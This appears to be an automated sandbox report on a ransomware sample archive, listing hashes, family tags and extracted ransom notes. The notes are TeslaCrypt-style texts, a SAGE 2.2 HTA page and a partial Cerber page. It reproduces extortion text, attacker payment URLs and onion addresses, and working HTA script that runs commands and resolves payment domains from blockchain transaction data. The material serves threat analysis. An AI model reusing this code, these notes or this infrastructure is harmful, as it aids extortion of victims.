Overview

overview

10

Static

static

1

RNSM00296.7z

windows7-x64

10

Analysis

  • max time kernel
    129s
  • max time network
    361s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 16:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00296.7z

  • Size

    21.2MB

  • MD5

    e33ed8c80e9f311f122a8fcc694cf6eb

  • SHA1

    445aae51e34f66694cf6b3289e884344057e3bd4

  • SHA256

    99ab7537a98111ce9f669ed719438ca3009489b4fc8fef2ee68b3e2969650401

  • SHA512

    38d0bd67e834ccb9134775cfaf03c2b9b6a59bbbc405949c1916a952efdabfb6579a597d76df8d45629589ed28984c890af5c948335f6a63d857d2b790a779c3

  • SSDEEP

    393216:LzK+Vgg+BInoy7nYDj2cCCGbur9cteJIKqywIyuscc1urLhQSkedG67573xj5i:30Ooys51KCy68PIyuauZpkcGie

Score
10/10
lockyteslacrypttroldeshdefense_evasiondiscoveryevasionexecutionimpactpersistenceransomwarespywarestealertrojanupx

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+nsubc.txt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA4096 More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA4096 Key , both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1 - http://t54ndnku456ngkwsudqer.wallymac.com/C1A73CCDB268BC60 2 - http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/C1A73CCDB268BC60 3 - http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/C1A73CCDB268BC60 If for some reasons the addresses are not available, follow these steps: 1 - Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2 - After a successful installation, run the browser 3 - Type in the address bar: xlowfznrg4wf7dli.onion/C1A73CCDB268BC60 4 - Follow the instructions on the site IMPORTANT INFORMATION Your personal pages http://t54ndnku456ngkwsudqer.wallymac.com/C1A73CCDB268BC60 http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/C1A73CCDB268BC60 http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/C1A73CCDB268BC60 Your personal page Tor-Browser xlowfznrg4wf7dli.ONION/C1A73CCDB268BC60
URLs

http://t54ndnku456ngkwsudqer.wallymac.com/C1A73CCDB268BC60

http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/C1A73CCDB268BC60

http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/C1A73CCDB268BC60

http://xlowfznrg4wf7dli.onion/C1A73CCDB268BC60

http://xlowfznrg4wf7dli.ONION/C1A73CCDB268BC60

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+jegqi.txt

Family

teslacrypt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://tt54rfdjhb34rfbnknaerg.milerteddy.com/A46A65A93297DCA0 2. http://kkd47eh4hdjshb5t.angortra.at/A46A65A93297DCA0 3. http://ytrest84y5i456hghadefdsd.pontogrot.com/A46A65A93297DCA0 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser 3. Type in the address bar: xlowfznrg4wf7dli.onion/A46A65A93297DCA0 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://tt54rfdjhb34rfbnknaerg.milerteddy.com/A46A65A93297DCA0 http://kkd47eh4hdjshb5t.angortra.at/A46A65A93297DCA0 http://ytrest84y5i456hghadefdsd.pontogrot.com/A46A65A93297DCA0 *-*-* Your personal page Tor-Browser: xlowfznrg4wf7dli.ONION/A46A65A93297DCA0
URLs

http://tt54rfdjhb34rfbnknaerg.milerteddy.com/A46A65A93297DCA0

http://kkd47eh4hdjshb5t.angortra.at/A46A65A93297DCA0

http://ytrest84y5i456hghadefdsd.pontogrot.com/A46A65A93297DCA0

http://xlowfznrg4wf7dli.ONION/A46A65A93297DCA0

Extracted

Path

C:\Users\Admin\Music\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; line-height: 1.2; } h2 { color: #555; text-align: center; line-height: 1.2; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 0.2em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AbXU_Xtcq5VVzSVzuX-vhtgr9NNxMMQ6Oy_BPTddHb0ClP-3MhsIEXPA" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> <span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span> <span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span> <span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span> <span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्‍टड हैं लेकिन रिस्‍टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्‍यूटर पर बाकी महत्‍वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+wracr.txt

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://p57gest54celltraf743knjf.mottesapo.com/A46A65A93297DCA0 2. http://k4restportgonst34d23r.oftpony.at/A46A65A93297DCA0 3. http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/A46A65A93297DCA0 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/A46A65A93297DCA0 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *** Your personal pages: http://p57gest54celltraf743knjf.mottesapo.com/A46A65A93297DCA0 http://k4restportgonst34d23r.oftpony.at/A46A65A93297DCA0 http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/A46A65A93297DCA0 *** Your personal page Tor-Browser: fwgrhsao3aoml7ej.ONION/A46A65A93297DCA0 *** Your personal identification ID: A46A65A93297DCA0
URLs

http://p57gest54celltraf743knjf.mottesapo.com/A46A65A93297DCA0

http://k4restportgonst34d23r.oftpony.at/A46A65A93297DCA0

http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/A46A65A93297DCA0

http://fwgrhsao3aoml7ej.onion/A46A65A93297DCA0

http://fwgrhsao3aoml7ej.ONION/A46A65A93297DCA0

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+ceyqr.txt

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server. What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/A46A65A93297DCA0 2. http://kk4dshfjn45tsnkdf34fg.tatiejava.at/A46A65A93297DCA0 3. http://94375hfsjhbdfkj5wfg.aladadear.com/A46A65A93297DCA0 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/A46A65A93297DCA0 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *** Your personal pages: http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/A46A65A93297DCA0 http://kk4dshfjn45tsnkdf34fg.tatiejava.at/A46A65A93297DCA0 http://94375hfsjhbdfkj5wfg.aladadear.com/A46A65A93297DCA0 *** Your personal page Tor-Browser: fwgrhsao3aoml7ej.ONION/A46A65A93297DCA0 *** Your personal identification ID: A46A65A93297DCA0
URLs

http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/A46A65A93297DCA0

http://kk4dshfjn45tsnkdf34fg.tatiejava.at/A46A65A93297DCA0

http://94375hfsjhbdfkj5wfg.aladadear.com/A46A65A93297DCA0

http://fwgrhsao3aoml7ej.onion/A46A65A93297DCA0

http://fwgrhsao3aoml7ej.ONION/A46A65A93297DCA0

Extracted

Path

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\README.hta

Ransom Note
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>CERBER RANSOMWARE - Instructions</title><HTA:APPLICATION APPLICATIONNAME="Cerber Ransomware - Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"><style>a {color: #04a;text-decoration: none;}a:hover {text-decoration: underline;}body {background-color: #e7e7e7;color: #222;font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif;font-size: 13pt;line-height: 19pt;}body, h1 {margin: 0;padding: 0;}hr {color: #bda;height: 2pt;margin: 1.5%;}h1 {color: #555;font-size: 14pt;}ol {padding-left: 2.5%;}ol li {padding-bottom: 13pt;}small {color: #555;font-size: 11pt;}ul {list-style-type: none;margin: 0;padding: 0;}.button {color: #04a;cursor: pointer;}.button:hover {text-decoration: underline;}.container {background-color: #fff;border: 2pt solid #c7c7c7;margin: 2.5%;min-width: 850px;padding: 2.5%;}.header {border-bottom: 2pt solid #c7c7c7;margin-bottom: 2.5%;padding-bottom: 2.5%;}.hr {background: #bda;display: block;height: 2pt;margin-top: 1.5%;margin-bottom: 1.5%;overflow: hidden;width: 100%;}.info {background-color: #efe;border: 2pt solid #bda;display: inline-block;padding: 1.5%;text-align: center;}.updating {color: red;display: none;}#change_language {float: right;}#change_language, #texts div {display: none;}</style></head><body><div class="container"><div class="header"><a href="#" id="change_language" onclick="return changeLanguage();" title="English">&#9745; English</a><h1>CERBER RANSOMWARE</h1><small id="title">Instructions</small></div><div id="languages"><p>&#9745; Select your language</p><ul><li><a href="#" title="English" onclick="return showBlock('en');">English</a></li><li><a href="#" title="Arabic" onclick="return showBlock('ar');">العربية</a></li><li><a href="#" title="Chinese" onclick="return showBlock('zh');">中文</a></li><li><a href="#" title="Dutch" onclick="return showBlock('nl');">Nederlands</a></li><li><a href="#" title="French" onclick="return showBlock('fr');">Français</a></li><li><a href="#" title="German" onclick="return showBlock('de');">Deutsch</a></li><li><a href="#" title="Italian" onclick="return showBlock('it');">Italiano</a></li><li><a href="#" title="Japanese" onclick="return showBlock('ja');">日本語</a></li><li><a href="#" title="Korean" onclick="return showBlock('ko');">한국어</a></li><li><a href="#" title="Polish" onclick="return showBlock('pl');">Polski</a></li><li><a href="#" title="Portuguese" onclick="return showBlock('pt');">Português</a></li><li><a href="#" title="Spanish" onclick="return showBlock('es');">Español</a></li><li><a href="#" title="Turkish" onclick="return showBlock('tr');">Türkçe</a></li></ul></div><div id="texts"><div id="en"><p>Can't you find the necessary files?<br>Is the content of your files not readable?</p><p>It is normal because the files' names and the data in your files have been encrypted by "Cerber&nbsp;Ransomware".</p><p>It means your files are NOT damaged! Your files are modified only. This modification is reversible.<br>From now it is not possible to use your files until they will be decrypted.</p><p>The only way to decrypt your files safely is to buy the special decryption software "Cerber&nbsp;Decryptor".</p><p>Any attempts to restore your files with the third-party software will be fatal for your files!</p><hr><p>You can proceed with purchasing of the decryption software at your personal page:</p><p><span class="info"><span class="updating">Please wait...</span><a id="megaurl" class="url" href="http://xrhwryizf5mui7a5.vx5whc.bid/FCD7-C8A8-CCD1-0446-86C8" 